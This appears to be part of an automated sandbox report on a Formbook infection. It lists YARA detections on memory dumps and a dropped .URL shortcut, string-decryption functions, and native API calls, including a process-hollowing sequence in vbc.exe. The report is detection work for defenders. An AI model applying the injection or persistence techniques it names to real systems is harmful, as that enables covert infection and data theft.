Source: 00000008.00000003.566048589.000000000389C000.00000004.00000001.sdmp, type: MEMORY Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 00000004.00000002.527023129.0000000072481000.00000020.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000002.527023129.0000000072481000.00000020.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000B.00000003.589071961.0000000003A4C000.00000004.00000001.sdmp, type: MEMORY Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 00000004.00000003.498894184.0000000004204000.00000004.00000001.sdmp, type: MEMORY Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 0000000B.00000003.589736597.0000000003A4C000.00000004.00000001.sdmp, type: MEMORY Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 0000000B.00000003.588471940.0000000003A4C000.00000004.00000001.sdmp, type: MEMORY Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 00000008.00000003.566256167.000000000389C000.00000004.00000001.sdmp, type: MEMORY Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 0000000B.00000003.588426706.0000000004724000.00000004.00000001.sdmp, type: MEMORY Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 00000008.00000003.565630232.000000000389C000.00000004.00000001.sdmp, type: MEMORY Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 00000008.00000003.564962472.000000000389C000.00000004.00000001.sdmp, type: MEMORY Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 00000008.00000002.608694553.0000000072481000.00000020.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000008.00000002.608694553.0000000072481000.00000020.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000003.499111193.0000000004204000.00000004.00000001.sdmp, type: MEMORY Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 0000000B.00000003.588316167.0000000004724000.00000004.00000001.sdmp, type: MEMORY Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 00000006.00000000.522033457.0000000072480000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000006.00000000.522033457.0000000072480000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000008.00000003.565804356.000000000389C000.00000004.00000001.sdmp, type: MEMORY Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 00000008.00000003.565037142.000000000389C000.00000004.00000001.sdmp, type: MEMORY Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 0000000B.00000003.589431920.0000000003A4C000.00000004.00000001.sdmp, type: MEMORY Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 00000004.00000003.498529438.00000000039CC000.00000004.00000001.sdmp, type: MEMORY Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 00000008.00000003.565767361.00000000044C4000.00000004.00000001.sdmp, type: MEMORY Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 00000004.00000003.499217073.00000000039CC000.00000004.00000001.sdmp, type: MEMORY Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 00000008.00000003.565155619.00000000044C4000.00000004.00000001.sdmp, type: MEMORY Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 00000004.00000003.498552553.0000000004204000.00000004.00000001.sdmp, type: MEMORY Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 00000012.00000000.633936132.0000000072480000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000012.00000000.633936132.0000000072480000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000008.00000003.565919206.000000000389C000.00000004.00000001.sdmp, type: MEMORY Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 0000000B.00000002.647442314.0000000072481000.00000020.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000B.00000002.647442314.0000000072481000.00000020.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000003.498960821.00000000039CC000.00000004.00000001.sdmp, type: MEMORY Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 0000000B.00000003.589253490.0000000003A4C000.00000004.00000001.sdmp, type: MEMORY Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 00000012.00000002.649627126.0000000072480000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000012.00000002.649627126.0000000072480000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000000.552620615.000000000977D000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000000.552620615.000000000977D000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000B.00000003.588930070.0000000003A4C000.00000004.00000001.sdmp, type: MEMORY Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 0000000B.00000003.588694775.0000000003A4C000.00000004.00000001.sdmp, type: MEMORY Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 0000000F.00000002.679695031.0000000000100000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000F.00000002.679695031.0000000000100000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000003.499152325.00000000039CC000.00000004.00000001.sdmp, type: MEMORY Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 0000000B.00000002.647169348.00000000048D4000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000B.00000002.647169348.00000000048D4000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000008.00000003.565204523.000000000389C000.00000004.00000001.sdmp, type: MEMORY Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 0000000E.00000000.596046676.0000000072480000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000E.00000000.596046676.0000000072480000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000E.00000002.615524302.0000000000290000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000E.00000002.615524302.0000000000290000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000003.499053483.0000000004204000.00000004.00000001.sdmp, type: MEMORY Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 0000000B.00000003.588167672.0000000003A4C000.00000004.00000001.sdmp, type: MEMORY Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 00000004.00000003.498574791.00000000039CC000.00000004.00000001.sdmp, type: MEMORY Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 00000008.00000003.565378996.00000000044C4000.00000004.00000001.sdmp, type: MEMORY Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 00000007.00000000.571508744.000000000977D000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000000.571508744.000000000977D000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000012.00000000.632901217.0000000072480000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000012.00000000.632901217.0000000072480000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000012.00000000.633270454.0000000072480000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000012.00000000.633270454.0000000072480000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000008.00000003.566095697.00000000044C4000.00000004.00000001.sdmp, type: MEMORY Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 00000004.00000003.498790069.00000000039CC000.00000004.00000001.sdmp, type: MEMORY Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 00000004.00000003.498758895.0000000004204000.00000004.00000001.sdmp, type: MEMORY Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 00000006.00000002.613597049.00000000006B0000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000006.00000002.613597049.00000000006B0000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000008.00000003.566398254.000000000389C000.00000004.00000001.sdmp, type: MEMORY Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 0000000E.00000000.595476317.0000000072480000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000E.00000000.595476317.0000000072480000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000006.00000000.520406918.0000000072480000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000006.00000000.520406918.0000000072480000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000008.00000003.565435086.000000000389C000.00000004.00000001.sdmp, type: MEMORY Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 00000008.00000003.565008941.00000000044C4000.00000004.00000001.sdmp, type: MEMORY Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 0000000E.00000000.599301608.0000000072480000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000E.00000000.599301608.0000000072480000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000B.00000003.588386407.0000000003A4C000.00000004.00000001.sdmp, type: MEMORY Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 0000000B.00000003.588750010.0000000004724000.00000004.00000001.sdmp, type: MEMORY Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 0000000B.00000003.588055915.0000000003A4C000.00000004.00000001.sdmp, type: MEMORY Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 00000004.00000003.499194499.0000000004204000.00000004.00000001.sdmp, type: MEMORY Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 0000000F.00000002.679811889.00000000001D0000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000F.00000002.679811889.00000000001D0000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000B.00000003.588226799.0000000004724000.00000004.00000001.sdmp, type: MEMORY Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 00000004.00000003.498986637.0000000004204000.00000004.00000001.sdmp, type: MEMORY Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 0000000B.00000003.589349293.0000000004724000.00000004.00000001.sdmp, type: MEMORY Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: C:\Users\user\dxbmjfsE.url, type: DROPPED Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Found potential string decryption / allocating functions
Source: C:\Windows\SysWOW64\logagent.exe Code function: String function: 020C3F92 appears 108 times
Source: C:\Windows\SysWOW64\logagent.exe Code function: String function: 020C373B appears 238 times
Source: C:\Windows\SysWOW64\logagent.exe Code function: String function: 0207E2A8 appears 38 times
Source: C:\Windows\SysWOW64\logagent.exe Code function: String function: 0207DF5C appears 118 times
Source: C:\Windows\SysWOW64\logagent.exe Code function: String function: 020EF970 appears 81 times
Source: C:\Users\Public\vbc.exe Code function: String function: 042F44F0 appears 56 times
Source: C:\Users\Public\vbc.exe Code function: String function: 004067E4 appears 61 times
Source: C:\Users\Public\vbc.exe Code function: String function: 04305754 appears 40 times
Source: C:\Users\Public\vbc.exe Code function: String function: 004042E4 appears 81 times
Source: C:\Users\user\Esfjmbxd.exe Code function: String function: 03C25754 appears 40 times
Source: C:\Users\user\Esfjmbxd.exe Code function: String function: 004038F8 appears 44 times
Source: C:\Users\user\Esfjmbxd.exe Code function: String function: 004049F0 appears 38 times
Source: C:\Users\user\Esfjmbxd.exe Code function: String function: 03C144F0 appears 56 times
Source: C:\Users\user\Esfjmbxd.exe Code function: String function: 004067E4 appears 122 times
Source: C:\Users\user\Esfjmbxd.exe Code function: String function: 03A35754 appears 40 times
Source: C:\Users\user\Esfjmbxd.exe Code function: String function: 004042E4 appears 162 times
Source: C:\Users\user\Esfjmbxd.exe Code function: String function: 0040E2B4 appears 42 times
Source: C:\Users\user\Esfjmbxd.exe Code function: String function: 0040F5BC appears 44 times
Source: C:\Users\user\Esfjmbxd.exe Code function: String function: 00404308 appears 46 times
Source: C:\Users\user\Esfjmbxd.exe Code function: String function: 03A244F0 appears 56 times
Contains functionality to call native functions
Source: C:\Users\Public\vbc.exe Code function: 4_2_00450FCC NtdllDefWindowProc_A, 4_2_00450FCC
Source: C:\Users\Public\vbc.exe Code function: 4_2_0044629C GetSubMenu,SaveDC,RestoreDC,GetWindowDC,SaveDC,RestoreDC,NtdllDefWindowProc_A, 4_2_0044629C
Source: C:\Users\Public\vbc.exe Code function: 4_2_00436A08 NtdllDefWindowProc_A,GetCapture, 4_2_00436A08
Source: C:\Users\Public\vbc.exe Code function: 4_2_00451770 IsIconic,SetActiveWindow,IsWindowEnabled,SetWindowPos,NtdllDefWindowProc_A, 4_2_00451770
Source: C:\Users\Public\vbc.exe Code function: 4_2_00451820 IsIconic,SetActiveWindow,IsWindowEnabled,NtdllDefWindowProc_A,SetWindowPos,SetFocus, 4_2_00451820
Source: C:\Users\Public\vbc.exe Code function: 4_2_0042BE54 NtdllDefWindowProc_A, 4_2_0042BE54
Source: C:\Users\Public\vbc.exe Code function: 4_2_042FCE34 CreateProcessA,GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,VirtualAllocEx,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,SetThreadContext,ResumeThread, 4_2_042FCE34
Source: C:\Windows\SysWOW64\logagent.exe Code function: 6_2_72498680 NtReadFile, 6_2_72498680
Source: C:\Windows\SysWOW64\logagent.exe Code function: 6_2_72498700 NtClose, 6_2_72498700
Source: C:\Windows\SysWOW64\logagent.exe Code function: 6_2_724987B0 NtAllocateVirtualMemory, 6_2_724987B0
Source: C:\Windows\SysWOW64\logagent.exe Code function: 6_2_724985D0 NtCreateFile, 6_2_724985D0
Source: C:\Windows\SysWOW64\logagent.exe Code function: 6_2_7249867A NtReadFile, 6_2_7249867A
Source: C:\Windows\SysWOW64\logagent.exe Code function: 6_2_724987AB NtAllocateVirtualMemory, 6_2_724987AB
Source: C:\Windows\SysWOW64\logagent.exe Code function: 6_2_724985CA NtCreateFile, 6_2_724985CA
Source: C:\Windows\SysWOW64\logagent.exe Code function: 6_2_02070048 NtProtectVirtualMemory,LdrInitializeThunk, 6_2_02070048
Source: C:\Windows\SysWOW64\logagent.exe Code function: 6_2_02070078 NtResumeThread,LdrInitializeThunk, 6_2_02070078
Source: C:\Windows\SysWOW64\logagent.exe Code function: 6_2_020700C4 NtCreateFile,LdrInitializeThunk, 6_2_020700C4
